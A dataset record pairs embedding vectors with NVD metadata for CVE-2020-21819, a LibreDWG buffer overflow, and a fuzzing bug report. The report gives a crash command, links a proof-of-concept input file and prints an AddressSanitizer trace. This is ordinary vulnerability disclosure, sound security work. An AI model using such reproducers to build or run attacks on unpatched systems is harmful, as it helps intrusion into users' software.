-0.0022601003292948008, -0.017904601991176605, -0.010687190108001232, -0.01726757176220417, -0.008294940926134586, -0.022092733532190323, 0.0034731675405055285, -0.005645168013870716, 0.022404471412301064, 0.017565757036209106, 0.013730023987591267, -0.011629180982708931, 0.00968420784920454, 0.006973442621529102, 0.008965854533016682, -0.02366497740149498, 0.005475745070725679, 0.01878560148179531, -0.014719453640282154, -0.0020686525385826826, -0.016020620241761208, -0.001588338753208518, 0.01778261736035347, -0.008999739773571491, 0.013465724885463715, -0.006068724673241377, 0.004608300514519215, -0.0072580729611217976, 0.010558429174125195, 0.01654922030866146, 0.0003727301664184779, -0.0027277071494609118, -0.005655333399772644, -0.010138260200619698, -0.0008818457135930657, 0.0058993021957576275, 0.013364071026444435, 0.008416924625635147, -0.005773929413408041, 0.00023952149786055088, 0.017281126230955124, 0.02294662408530712, 0.021591242402791977, -0.016074836254119873, 0.017836833372712135, -0.0014866851270198822, -0.0066074891947209835, -0.01463813055306673, -0.022783977910876274, -0.0249390359967947, 0.004720119293779135, -0.02104908972978592, 0.028734108433127403, 0.0053740912117064, 0.01791815645992756, 0.008396593853831291, -0.007210634648799896, -0.002202496398240328, -0.00583830988034606, -0.00017577616381458938, -0.018202785402536392, -0.008247502148151398, -0.02675524912774563, -0.012171334587037563, -0.008403371088206768, -0.01603417471051216, -0.012625387869775295, -0.009541892446577549, -0.007434272672981024, -0.01036867592483759, -0.008057748898863792, 0.0008267833036370575, 0.013601263053715229, 0.004103420302271843, 0.005594341084361076, 0.01988346129655838, 0.013201424852013588, -0.02314993180334568, 0.014597469009459019, -0.010829505510628223, 0.02968287467956543, 0.00008418195648118854, -0.014150192961096764, -0.004645573440939188, -0.009108169935643673, -0.005191114731132984, -0.001156310667283833, -0.005208056885749102, -0.007596918381750584, 0.015898635610938072, -0.00126219994854182, 0.015248052775859833, 0.010029830038547516, -0.008477916941046715, -0.014868545345962048, 0.0028361377771943808, 0.006014509592205286, 0.009819746017456055, 0.0034375886898487806, 0.01121578924357891, -0.0175386480987072, -0.011493642814457417, 0.0050962381064891815, 0.025535404682159424, -0.009711314924061298, 0.022824639454483986, -0.0035646557807922363, 0.007203857880085707, -0.014204408042132854, -0.003998378291726112, -0.01214422658085823, 0.023434562608599663, -0.00916916225105524, 0.01702360436320305, -0.013208202086389065, -0.0019788583740592003, 0.009508008137345314, 0.0024752672761678696, -0.029845520853996277, -0.018135016784071922, 0.013126878999173641, -0.004703177139163017, 0.007420718669891357, 0.004920038394629955, 0.003537548240274191, 0.0040017664432525635, -0.009914622642099857, -0.009392800740897655, 0.005269049201160669, -0.012103565037250519, -0.003774740034714341, -0.0006073807599022985, 0.025942020118236542, 0.03361348435282707, 0.032285209745168686, 0.002892047166824341, -0.006946335081011057, -0.008450809866189957, -0.009413131512701511, 0.0001988600124605, -0.015559790655970573, -0.008477916941046715, 0.014217961579561234, 0.008633785881102085, 0.006851458456367254, 0.022607779130339622, -0.01042289100587368, -0.013092994689941406, 0.023448117077350616, -0.0011385212419554591, 0.00028907766682095826, 0.009074285626411438, 0.0012249269057065248, -0.002214356092736125, -0.0019890237599611282, 0.011669842526316643, -0.01124967448413372, -0.019381968304514885, -0.003950939979404211, 0.0017272655386477709, 0.009128500707447529, 0.02026296779513359, 0.02057470567524433, 0.008681224659085274, 0.0029022125527262688, 0.015397144481539726, 0.005153841804713011, -0.009704538621008396, 0.01623748242855072, 0.021902980282902718, 0.0021025370806455612, 0.025237221270799637, 0.004523588810116053, -0.0019365026382729411, 0.0014722842024639249, -0.004550696350634098, -0.009670653380453587, 0.018378986045718193, 0.005058965180069208, -0.03570077195763588, 0.01025346852838993, 0.006122940219938755, 0.018324770033359528, 0.008918416686356068, -0.004689623136073351, -0.013479278422892094, -0.016766080632805824, 0.02476283721625805, 0.021889425814151764, -0.001608669525012374, -0.01084983628243208, -0.03171594813466072, 0.006959888618439436, -0.010571982711553574, -0.02001899853348732, 0.018961800262331963, 0.0074003878980875015, 0.00034223406692035496, 0.003042833646759391, 0.007285180501639843, 0.003805236192420125, 0.006817573681473732, -0.017050711438059807, -0.0037408554926514626, 0.01068041380494833, 0.022512901574373245, -0.00437788525596261, -0.00682773906737566, -0.0024684902746230364, -0.03182438015937805, -0.012957456521689892, 0.010626198723912239, 0.002593863056972623, -0.011568188667297363, -0.008111963979899883, -0.019043123349547386, -0.0005171631346456707, -0.006885342765599489, 0.0026853515300899744, -0.011493642814457417, -0.01444837637245655, -0.024952590465545654, -0.004465985111892223, -0.01892113871872425, -0.021848764270544052, 0.01444837637245655, 0.01661698892712593, 0.016495004296302795, -0.039089228957891464, -0.010802398435771465, -0.01078206766396761, -0.0003257153439335525, 0.014773668721318245, -0.0014460235834121704, -0.009074285626411438, -0.005069130100309849, -0.04529688134789467, 0.00459135789424181, 0.0013596180360764265, 0.00583153311163187, -0.003213950665667653, 0.02243157848715782, -0.002575226593762636, 0.008389817550778389, -0.013919777236878872, -0.012239103205502033, 0.004079701378941536, 0.00016741090803407133, 0.024708621203899384, 0.005526572000235319, -0.005363925825804472, 0.014190854504704475, 0.001434164005331695, 0.010124706663191319, 0.0010419503087177873, -0.007007327396422625, -0.0013579237274825573, 0.012069680728018284, -0.002810724312439561, -0.015803759917616844, -0.00902684684842825, -0.018107909709215164, -0.004398216027766466, 0.005431694909930229, -0.014123084954917431, -0.015912190079689026, 0.008782878518104553, 0.01747087948024273, -0.006946335081011057, -0.007427495904266834, 0.007163196336477995, -0.01637301966547966, 0.0025396477431058884, 0.0038763938937336206, -0.014814330264925957, 0.004872600082308054, -0.010402560234069824, 0.009657099843025208, -0.008735439740121365, -0.0005972153740003705, -0.018582293763756752, -0.002822584006935358, -0.0003682828100863844, 0.022933071479201317, -0.023637870326638222, -0.0024634075816720724, 0.003825566964223981, -0.012869356200098991, 0.025440528988838196, 0.006448232103139162, -0.0005747668910771608, 0.005607894621789455, -0.010707520879805088, -0.001719641499221325, 0.003920443821698427, 0.03570077195763588, 0.0185687392950058, -0.012272988446056843, 0.0004195332294330001, -0.005560456309467554, -0.0033562658354640007, 0.01950395293533802, 0.0006827738834545016, -0.041366271674633026, 0.014299284666776657, -0.033965885639190674, -0.002598945749923587, 0.01829766295850277, 0.01775551028549671, 0.013892670162022114, 0.0020567928440868855, -0.0009648628765717149, -0.0057807061821222305, -0.004262677859514952, 0.0013443699572235346, 0.005641779396682978, -0.002651466988027096, -0.007583364844322205, -0.0004290632496122271, 0.002307538641616702, 0.0049979728646576405, -0.013960438780486584, 0.04182710126042366, 0.0029072952456772327, 0.017836833372712135, 0.012388195842504501, 0.006627819966524839, 0.002022908302024007, 0.0013816430000588298, -0.005079295486211777, -0.0027260128408670425, 0.022174056619405746, -0.0016434012213721871, 0.0060077328234910965, -0.0021465870086103678, -0.006265255156904459, -0.0021804715506732464, 0.012679602950811386, -0.004472761880606413, -0.005431694909930229, -0.010443221777677536, -0.004733673296868801, -0.0009436850086785853, -0.01188670378178358, 0.01798592507839203, -0.016738973557949066, 0.007251296192407608, 0.00459135789424181, 0.006936169695109129, -0.007217411417514086, 0.015437806025147438, -0.011330997571349144, 0.04461919143795967, -0.010002722032368183, -0.0168609581887722, -0.006712531670928001, -0.0032308928202837706, -0.00417796615511179, 0.007244518958032131, 0.012354310601949692, 0.005862029269337654, -0.007108980789780617, 0.006912450306117535, -0.012103565037250519, -0.012381418608129025, -0.001982246758416295, 0.0038560631219297647, -0.003950939979404211, 0.00984007678925991, 0.013669031672179699, 0.012062903493642807, 0.012008688412606716, 0.013628370128571987, -0.00020426037372089922, -0.009894291870296001, -0.00484210392460227, -0.012340757064521313, 0.00609583267942071, 0.018704278394579887, -0.015329375863075256, 0.004960699938237667, -0.0040864781476557255, -0.009901069104671478, -0.021238842979073524, -0.02019519917666912, 0.011310666799545288, -0.028598569333553314, -0.0002109313936671242, 0.002178777242079377, -0.002900518476963043, -0.01809435524046421, 0.02449176087975502, -0.0015485244803130627, -0.002703987993299961, 0.0033291580621153116, 0.0019297257531434298, -0.002490515122190118, -0.009670653380453587, -0.0007590141613036394, -0.003920443821698427, 0.006580381654202938, 0.007393611129373312, -0.011954473331570625, -0.003285108134150505, 0.009148831479251385, -0.010192476212978363, -0.005428306758403778, -0.008301717229187489, 0.0015087100910022855, 0.007535926532000303, 0.004103420302271843, 0.014854991808533669, -0.00006665728142252192, 0.005496075842529535, -0.01885337010025978, -0.005570621695369482, -0.00010244785516988486, -0.0137571319937706, -0.008240724913775921, -0.016413681209087372, 0.013187871314585209, 0.01650855876505375, 0.005750210024416447, -0.003088577650487423, -0.022377364337444305, -0.0003183030930813402, 0.01970726065337658, 0.008349156007170677, -0.0008843870600685477, 0.0013630064204335213, -0.012666048482060432, 0.01661698892712593, 0.0013689362676814198, -0.009033624082803726, -0.011337773874402046, 0.00401532044634223, 0.0005612130626104772, -0.0008322895155288279, -0.002099148463457823, -0.024898376315832138, -0.00271245907060802, 0.007664687931537628, -0.013736801221966743, 0.0019788583740592003, 0.009846853092312813, 0.02033073641359806, 0.0022533233277499676, -0.014123084954917431, 0.016156159341335297, 0.02741938643157482, 0.0175386480987072, -0.009365692734718323, 0.007122534792870283, -0.018758492544293404, 0.023759854957461357, 0.003815401578322053, 0.013194647617638111, 0.011737612076103687, -0.03247496485710144, 0.0014553419314324856, -0.005275825969874859, -0.001318109454587102, 0.004045816604048014, 0.03838443011045456, -0.016047727316617966, 0.006915838923305273, 0.01709137298166752, 0.014258623123168945, 0.0051606185734272, 0.0035917635541409254, -0.009325031191110611, -0.021252397447824478, 0.014800775796175003, -0.005499464459717274, 0.021835211664438248, 0.013533493503928185, 0.0039916010573506355, 0.00745460344478488, -0.009589331224560738, 0.010002722032368183, -0.0010360204614698887, 0.003335935063660145, -0.007705349009484053, 0.025942020118236542, -0.002482044044882059, 0.011446204967796803, 0.00242444034665823, 0.010070491582155228, 0.000646347994916141, -0.015071853064000607, 0.016020620241761208, 0.0023854731116443872, -0.012117118574678898, -0.003186842892318964, 0.0022279098629951477, -0.03017081320285797, 0.014245069585740566, -0.012774479575455189, 0.009785860776901245, -0.018826263025403023, 0.010056938044726849, 0.0071496423333883286, 0.024369776248931885, 0.028083523735404015, -0.009345361962914467, 0.0008373722084797919, 0.035212837159633636, 0.001446870737709105, -0.015505575574934483, 0.0059975674375891685, 0.012130673043429852, 0.01119545940309763, -0.016901619732379913, -0.016698312014341354, 0.02211984060704708, 0.009772307239472866, -0.002204190706834197, 0.006078890059143305, 0.015600452199578285, -0.004831938538700342, 0.02071024291217327, -0.019016016274690628, 0.008660893887281418, -0.023299023509025574, -0.004323670174926519, 0.025874251499772072 ]
58
CVE-2020-21819
2021-05-17T19:15:07.610000
A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10.2641via htmlescape ../../programs/escape.c:51.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Not Applicable" ], "url": "http://gnu.com" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/182#issuecomment-572890901" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10.2641:*:*:*:*:*:*:*", "matchCriteriaId": "767F5F8A-A209-4A53-B40E-4C30602BA5CB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/182#issuecomment-572890901
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2SVG $PoC **1.NULL pointer dereference in htmlescape ../../programs/escape.c:29** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_7b9cb829/id:000013%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:46417 ASAN says: ``` ================================================================= ==19607==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f433bb56646 bp 0x7ffed1176670 sp 0x7ffed1175de8 T0) ==19607==The signal is caused by a READ memory access. ==19607==Hint: address points to the zero page. #0 0x7f433bb56645 (/lib/x86_64-linux-gnu/libc.so.6+0xb1645) #1 0x7f433c28557b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5157b) #2 0x55950b27cdd4 in htmlescape ../../programs/escape.c:29 #3 0x55950b27abb5 in output_TEXT ../../programs/dwg2SVG.c:113 #4 0x55950b27abb5 in output_object ../../programs/dwg2SVG.c:312 #5 0x55950b27abb5 in output_BLOCK_HEADER ../../programs/dwg2SVG.c:371 #6 0x55950b278477 in output_SVG ../../programs/dwg2SVG.c:411 #7 0x55950b278477 in main ../../programs/dwg2SVG.c:525 #8 0x7f433bac6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55950b278d19 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwg2SVG+0x27ad19) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xb1645) ==19607==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/182/comments
9
2020-01-10T06:17:10
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/182
547,887,727
182
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2SVG $PoC **1.NULL pointer dereference in htmlescape ../../programs/escape.c:29** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_7b9cb829/id:000013%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:46417 ASAN says: ``` ================================================================= ==19607==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f433bb56646 bp 0x7ffed1176670 sp 0x7ffed1175de8 T0) ==19607==The signal is caused by a READ memory access. ==19607==Hint: address points to the zero page. #0 0x7f433bb56645 (/lib/x86_64-linux-gnu/libc.so.6+0xb1645) #1 0x7f433c28557b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5157b) #2 0x55950b27cdd4 in htmlescape ../../programs/escape.c:29 #3 0x55950b27abb5 in output_TEXT ../../programs/dwg2SVG.c:113 #4 0x55950b27abb5 in output_object ../../programs/dwg2SVG.c:312 #5 0x55950b27abb5 in output_BLOCK_HEADER ../../programs/dwg2SVG.c:371 #6 0x55950b278477 in output_SVG ../../programs/dwg2SVG.c:411 #7 0x55950b278477 in main ../../programs/dwg2SVG.c:525 #8 0x7f433bac6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55950b278d19 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwg2SVG+0x27ad19) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xb1645) ==19607==ABORTING ``` --- end body ---
1,657
[ -0.02616121992468834, 0.03775846213102341, -0.007038506679236889, 0.010361101478338242, 0.06382977962493896, 0.04114473611116409, -0.0059709311462938786, 0.04408150538802147, -0.030746174976229668, 0.005510188173502684, -0.013530115596950054, -0.0007861663470976055, -0.003036034991964698, 0.021381478756666183, -0.00865298043936491, 0.021096790209412575, -0.015582856722176075, -0.003206472611054778, -0.020946955308318138, -0.027659570798277855, 0.015522923320531845, -0.0063792322762310505, -0.03476175665855408, 0.017485763877630234, -0.024872636422514915, 0.0046748570166528225, 0.008106082677841187, 0.0036353757604956627, -0.026520824059844017, 0.018010186031460762, 0.004495054949074984, 0.01877434551715851, 0.010555887594819069, 0.011132752522826195, 0.029307758435606956, -0.023808807134628296, 0.053011681884527206, 0.06305063515901566, 0.013897211290895939, 0.03919687867164612, 0.015418038703501225, -0.07323943078517914, -0.013155527412891388, 0.014414142817258835, 0.00025659272796474397, 0.0030660019256174564, 0.026835476979613304, 0.0005515806842595339, -0.019373686984181404, 0.010743181221187115, -0.011874436400830746, -0.010143840685486794, -0.03425231948494911, -0.08396762609481812, 0.02198081836104393, -0.023029664531350136, 0.026221154257655144, 0.007210817188024521, 0.004865896888077259, 0.006266855634748936, -0.02141144499182701, 0.01562780700623989, -0.0002432480250718072, 0.0121815986931324, 0.011657175607979298, 0.020197780802845955, -0.03263409808278084, -0.0014824316604062915, -0.02394365891814232, -0.003515507560223341, 0.018519626930356026, -0.03718908876180649, 0.0005248913075774908, 0.02611626870930195, 0.019538505002856255, -0.0181600209325552, 0.0017802290385589004, 0.012496252544224262, -0.02415342815220356, 0.004289031494408846, -0.014286782592535019, 0.02986214868724346, -0.02833382971584797, 0.008031165227293968, -0.0002049698232440278, 0.0018823042046278715, -0.014736288227140903, -0.08672459423542023, -0.0020920734386891127, -0.045010484755039215, -0.006341773085296154, 0.03886724263429642, 0.011200178414583206, -0.021456396207213402, -0.0018869865452870727, -0.0020695982966572046, -0.035900503396987915, -0.007356906309723854, -0.0490560308098793, -0.000238916851230897, -0.028963137418031693, -0.012084205634891987, -0.001803640741854906, 0.019508538767695427, 0.03064129129052162, 0.038118064403533936, 0.021186692640185356, -0.002543451962992549, 0.010495953261852264, 0.12004793435335159, 0.0324842631816864, -0.013005692511796951, -0.02284986339509487, 0.0048696426674723625, 0.0071433912962675095, 0.013163018971681595, 0.022250521928071976, -0.01988312602043152, -0.038807306438684464, -0.024183396250009537, -0.006899909116327763, -0.028393764048814774, -0.01260862872004509, -0.015103384852409363, -0.040575362741947174, 0.022939763963222504, 0.004169163294136524, -0.010555887594819069, -0.01702127419412136, -0.0075029958970844746, -0.0318249873816967, -0.03584057092666626, 0.01468384638428688, -0.017246026545763016, 0.027749473229050636, -0.009746777825057507, -0.04977524280548096, 0.01898411475121975, 0.004940814338624477, -0.00824093446135521, -0.07180100679397583, -0.0382978692650795, 0.027329934760928154, -0.007694035768508911, -0.03425231948494911, 0.0004057255282532424, -0.03685944899916649, -0.0031727596651762724, -0.0033993853721767664, -0.013552590273320675, -0.017665565013885498, -0.014406651258468628, 0.01848965883255005, 0.022894812747836113, 0.04722804203629494, -0.02341923676431179, 0.022250521928071976, 0.03724902123212814, 0.010218758136034012, -0.031075812876224518, 0.014511535875499249, -0.025906499475240707, 0.020167812705039978, -0.04731794446706772, -0.03317350521683693, -0.011762060225009918, 0.015268202871084213, 0.0238687414675951, -0.01502846647053957, 0.02533712610602379, -0.01910398341715336, -0.0025097390171140432, 0.020032960921525955, 0.02120167575776577, -0.059814196079969406, 0.003828288521617651, -0.008495653979480267, 0.02353910356760025, -0.017785433679819107, -0.012803414836525917, -0.011747077107429504, 0.005424032919108868, 0.004854659084230661, 0.009754269383847713, 0.015268202871084213, 0.006461641285568476, 0.03985615447163582, -0.011484865099191666, 0.006993556395173073, -0.029712313786149025, -0.01499100774526596, -0.012683546170592308, -0.002382379025220871, -0.04483067989349365, 0.027854356914758682, -0.013020675629377365, -0.045340120792388916, -0.008023672737181187, 0.028603533282876015, -0.01203925535082817, 0.013447705656290054, 0.014698829501867294, -0.006045849062502384, 0.002258765045553446, -0.005813604220747948, 0.01435420848429203, -0.004468833561986685, 0.053461186587810516, 0.005011986009776592, -0.010488461703062057, -0.017485763877630234, -0.03212466090917587, 0.019748274236917496, 0.0037458790466189384, -0.02878333441913128, 0.0037290225736796856, -0.015807610005140305, 0.020107878372073174, -0.02915792353451252, 0.004083008039742708, 0.029292775318026543, -0.018354807049036026, -0.0008212840184569359, -0.011469881981611252, -0.08061131834983826, -0.012488760985434055, 0.0015536033315584064, 0.02448306605219841, -0.05427029728889465, -0.002344920299947262, 0.009177403524518013, -0.04180401191115379, -0.003796448465436697, 0.015687741339206696, -0.010922983288764954, -0.0020265206694602966, -0.0068549588322639465, 0.01126011274755001, -0.026430923491716385, 0.010083906352519989, 0.019793225452303886, 0.020782137289643288, -0.008990109898149967, -0.0077914283610880375, 0.025456994771957397, 0.033892713487148285, -0.020167812705039978, -0.012481269426643848, -0.01636200025677681, 0.028933169320225716, 0.01154479943215847, -0.031135747209191322, 0.017785433679819107, 0.023059632629156113, 0.01862451061606407, 0.006113274488598108, 0.03350314125418663, 0.02620616927742958, -0.023314351215958595, -0.03392267972230911, 0.05178303271532059, -0.003699055640026927, -0.007263259496539831, 0.008533112704753876, 0.0018373536877334118, -0.012436318211257458, -0.02243032492697239, 0.01463889516890049, -0.02144141122698784, -0.035660769790410995, 0.0464189350605011, -0.026266103610396385, -0.0007585405255667865, -0.008443211205303669, -0.026745576411485672, 0.011522323824465275, 0.02903805486857891, 0.004667365457862616, 0.0016987561248242855, -0.013590048998594284, 0.0013260411797091365, 0.022280488163232803, -0.020122863352298737, 0.038687437772750854, 0.013545098714530468, -0.01246628537774086, -0.005424032919108868, -0.017320945858955383, -0.015837576240301132, -0.00955199170857668, -0.003007940948009491, -0.00047877017641440034, -0.03754869103431702, -0.0066114766523242, -0.0022231792099773884, 0.04770751670002937, 0.02160623110830784, -0.002678303513675928, -0.03919687867164612, -0.011941862292587757, -0.02058735117316246, -0.01754569821059704, -0.010421035811305046, 0.0028169010765850544, -0.036020372062921524, 0.008802816271781921, -0.009836678393185139, 0.027824390679597855, -0.022295473143458366, -0.009701826609671116, 0.02460293471813202, -0.05412046238780022, -0.007660322822630405, -0.02403355948626995, -0.019778242334723473, -0.02264009416103363, 0.007240784354507923, -0.04198381304740906, -0.0015517304418608546, 0.000701884098816663, -0.048696428537368774, -0.01029367558658123, -0.03368294611573219, 0.012878332287073135, 0.0382978692650795, -0.02243032492697239, -0.008533112704753876, 0.031135747209191322, -0.06754568964242935, 0.027869340032339096, 0.02264009416103363, -0.026475872844457626, -0.001458083395846188, -0.01959843933582306, -0.009784236550331116, -0.0568474605679512, -0.03949654847383499, 0.016182197257876396, 0.029757263138890266, -0.015230744145810604, -0.01474377978593111, 0.02783937379717827, 0.013500148430466652, -0.00836829375475645, 0.01669163815677166, -0.029187889769673347, 0.014241832308471203, -0.004322744440287352, 0.034462086856365204, -0.015178302302956581, 0.0009533262345939875, 0.05678752809762955, -0.011664667166769505, 0.02127659320831299, 0.00937218964099884, -0.04522025212645531, 0.002161372220143676, -0.03560083359479904, 0.015612823888659477, -0.009177403524518013, 0.018100088462233543, -0.010690739378333092, 0.016302065923810005, 0.013552590273320675, 0.014946057461202145, 0.005131854210048914, 0.0028918187599629164, 0.003929427359253168, -0.0050644283182919025, 0.0012885824544355273, -0.03416241705417633, 0.050584349781274796, -0.024917587637901306, -0.02403355948626995, -0.017216060310602188, -0.019163917750120163, 0.03605034202337265, 0.00955199170857668, -0.037578657269477844, 0.005008240230381489, -0.0238687414675951, -0.01400209590792656, 0.003288881853222847, -0.025636795908212662, 0.02365897223353386, 0.059394657611846924, -0.009746777825057507, 0.027284983545541763, -0.010248725302517414, -0.028019174933433533, -0.0035342369228601456, 0.07240035384893417, -0.016167214140295982, -0.04782738536596298, 0.016212165355682373, 0.04132453724741936, -0.02066226862370968, -0.011702125892043114, 0.009581958875060081, -0.03706922009587288, -0.009199879132211208, 0.019628405570983887, -0.013118068687617779, 0.0022980968933552504, 0.009439615532755852, 0.033113572746515274, -0.0014430999290198088, -0.017980219796299934, 0.018339823931455612, 0.0028543598018586636, -0.0036203921772539616, -0.022235538810491562, -0.004094245843589306, 0.0021538804285228252, 0.05265207588672638, 0.03317350521683693, -0.0036335026379674673, 0.02530715987086296, -0.024797718971967697, -0.008203474804759026, -0.0006677029305137694, -0.018879231065511703, 0.019838174805045128, 0.026880428194999695, 0.002861851593479514, 0.025082405656576157, -0.0243631973862648, 0.02070721983909607, 0.027404852211475372, -0.03320347145199776, -0.01586754433810711, 0.010937967337667942, 0.011956846341490746, 0.034551989287137985, -0.023359302431344986, -0.04042552784085274, -0.015035958960652351, -0.040545396506786346, 0.003899460192769766, 0.01595744490623474, 0.0029142939019948244, 0.020302664488554, -0.0269403625279665, -0.004041803535073996, -0.02148636244237423, -0.029247824102640152, -0.04375186935067177, -0.007753969635814428, 0.021231641992926598, -0.034102484583854675, 0.007753969635814428, 0.021621214225888252, -0.015582856722176075, 0.010698230937123299, 0.0031296820379793644, -0.011559782549738884, -0.03913694620132446, -0.0005164630711078644, 0.034222353249788284, 0.007439315784722567, -0.024468082934617996, 0.024168411269783974, -0.02177104912698269, -0.01449655182659626, 0.009364698082208633, 0.038327835500240326, 0.03826789930462837, -0.04021575674414635, 0.0017146761529147625, 0.0038264153990894556, 0.0018551466055214405, 0.021471379324793816, 0.016661670058965683, -0.02325441688299179, -0.00890020839869976, 0.028303861618041992, -0.018055137246847153, -0.007971230894327164, 0.0010947331320494413, -0.010698230937123299, 0.0009472391684539616, -0.02882828563451767, 0.006461641285568476, -0.01579262688755989, 0.028109077364206314, -0.025906499475240707, 0.042583152651786804, 0.00033572441316209733, 0.00045442197006195784, 0.03937667980790138, -0.004423883277922869, 0.014234340749680996, -0.0073381769470870495, -0.058285877108573914, 0.0006775358924642205, 0.02894815430045128, -0.02013784646987915, -0.04519028589129448, 0.0409349650144577, 0.02042253315448761, 0.033443208783864975, 0.0011602860176935792, 0.027704522013664246, -0.003764608409255743, 0.02455798350274563, -0.008413244038820267, -0.041024867445230484, 0.006457895506173372, -0.005053190980106592, -0.03034162148833275, 0.009319746866822243, -0.03817800059914589, 0.00767905218526721, -0.0515732616186142, 0.0025771649088710546, -0.017320945858955383, -0.006210667546838522, 0.01037608552724123, 0.004232843406498432, 0.004487562924623489, -0.01057836227118969, -0.03092597797513008, -0.015125859528779984, 0.034462086856365204, 0.01595744490623474, 0.010758164338767529, 0.0023486660793423653, -0.011514832265675068, 0.018399758264422417, -0.03218459337949753, 0.0034967781975865364, -0.011821994557976723, -0.02689541131258011, 0.050704218447208405, -0.006585255265235901, 0.019059032201766968, -0.010990409180521965, 0.03140544891357422, 0.004843421746045351, -0.015567873604595661, -0.022580159828066826, 0.03685944899916649, -0.05277194455265999, 0.0021576264407485723, -0.0043077608570456505, 0.018804313614964485, -0.014406651258468628, 0.020902005955576897, 0.003375037107616663, -0.017905302345752716, -0.006150733679533005, 0.004764758050441742, -0.0020508687011897564, 0.004367695190012455, -0.01612226292490959, -0.010780639946460724, -0.024962538853287697, -0.008637997321784496, 0.030896009877324104, -0.008960142731666565, 0.012533711269497871, -0.005184296518564224, 0.037878330796957016, -0.004712315741926432, -0.005379082169383764, 0.006731344852596521, -0.0002521444985177368, 0.03067125752568245, -0.043901704251766205, -0.021336527541279793, 0.029097989201545715, 0.0183248408138752, 0.012368892319500446, -0.020812103524804115, -0.03913694620132446, -0.005761161912232637, -0.021546296775341034, -0.005094395484775305, -0.005697482265532017, -0.03212466090917587, 0.00016282868455164135, -0.035570867359638214, -0.016751570627093315, 0.026011385023593903, 0.018669461831450462, -0.01242882665246725, 0.009589450433850288, -0.00709469523280859, 0.020032960921525955, -0.005686244461685419, 0.007031015120446682, 0.0030978419817984104, -0.015567873604595661, -0.01244381070137024, 0.026745576411485672, 0.012623612768948078, -0.009139944799244404, 0.005375336389988661, -0.013050642795860767, 0.008675456047058105, -0.002241908572614193, 0.01443661842495203, 0.024707818403840065, -0.02329936809837818, -0.027824390679597855, 0.011170211248099804, 0.009611926041543484, -0.010473477654159069, -0.02219058759510517, 0.020512433722615242, 0.020062929019331932, 0.008293376304209232, 0.06928378343582153, -0.005390319973230362, 0.019778242334723473, -0.008046148344874382, -0.01029367558658123, 0.027494752779603004, -0.031105779111385345, 0.018804313614964485, 0.015777641907334328, -0.03515132889151573, 0.015762658789753914, 0.020692236721515656, 0.008353310637176037, 0.0376385934650898, 0.00314279249869287, -0.005626310594379902, -0.01738087832927704, 0.001820497214794159, -0.0207971204072237, 0.01886424794793129, 0.000653655908536166, -0.022370390594005585, -0.02124662697315216, 0.0399460531771183, 0.053910691291093826, 0.030776143074035645, -0.01453401055186987, 0.013642491772770882, 0.007529216818511486, -0.0005253595300018787, -0.013357805088162422, 0.013267903588712215, -0.019089000299572945, -0.00773149449378252, 0.009207370691001415, 0.016961339861154556, 0.01730596087872982, 0.047797415405511856, -0.022280488163232803, -0.01877434551715851, 0.008495653979480267, 0.015732692554593086, 0.027464784681797028, -0.004266556352376938, 0.010421035811305046, 0.03191488981246948, -0.0008325216476805508, 0.01792028546333313, 0.00026431860169395804, -0.030401553958654404, -0.03853760287165642, 0.007210817188024521, -0.01308060996234417, 0.007087203208357096, -0.0399460531771183, -0.007439315784722567, 0.00830086786299944, 0.020557384938001633, -0.0008503145654685795, -0.008637997321784496, -0.0033094841055572033, -0.0006906464695930481, -0.017905302345752716, 